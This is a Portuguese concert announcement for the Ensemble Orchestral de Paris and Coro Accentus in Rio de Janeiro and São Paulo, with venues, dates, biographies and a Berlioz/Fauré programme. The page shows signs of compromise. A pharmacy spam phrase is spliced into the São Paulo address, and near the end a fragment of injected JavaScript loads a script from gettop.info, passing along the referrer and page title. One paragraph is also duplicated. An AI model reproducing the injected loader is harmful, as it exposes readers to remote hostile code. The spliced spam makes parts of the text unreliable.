LateralMúsica coralMúsica sinfônicaProgramaçãoRio de JaneiroSão Paulo

Ensemble Orchestral de Paris & Coro Accentus

“Uma mistura perfeita de rigor e vivacidade.” – Le Figaro, Paris

SERVIÇO

 

Rio de Janeiro

Theatro Municipal do Rio de Janeiro
Praça Marechal Floriano, s/no.
Fone: 21 2332 9134

Dia 29.09, às 20:30h.

Ingressos: ver no local
Televendas: (21) 3235-8545

 

São Paulo

Sala São Paulo
Praça Júlio Prestes, s/no. will zithromax kill pseudomonas
Fone: 11 3223 3966

Dias 30.09 e 01.10, às 21h.

Ingressos: ver no local

 

Laurence Equilbey

Atuando desde 2009 sob a batuta de Joseph Swensen, seu regente convidado principal e conselheiro artístico, oEnsemble Orchestral de Paris costuma associar-se a músicos do mais alto gabarito em suas temporadas anuais no Thêátre des Champs- Élysées e em turnês por Europa, Japão e América do Sul.

Formação de grande destaque no cenário musical parisiense, o Ensemble Orchestral de Paris, criado em 1978, é hoje a principal orquestra de câmara francesa. Atuando desde 2009 sob a batuta de Joseph Swensen, seu regente convidado principal e conselheiro artístico, o grupo costuma associar-se a musicistas do mais alto gabarito em suas temporadas anuais no Thêátre des Champs- Élysées e em turnês por Europa, Japão e América do Sul.

Dentre seus parceiros mais constantes figura o Coro Accentus, fundado em 1991 pela conceituada regente francesa Laurence Equilbey. Coro residente da Ópera de Rouen, o Accentus realiza cerca de 60 concertos anuais, dentre elespremières de obras corais contemporâneas. Sua discografia de mais de 20 títulos já foi alvo de vários prêmios da crítica, assim como de uma indicação ao Grammy em 2006.

 

PROGRAMA

Berlioz
Morte de Cleópatra
Tristia no. 1

Faurè
Requiem
Coro Accentus
Mireille Delunsch – Soprano
Matthew Brook – Baixo-barítono

 } else {s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Leave a Response

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.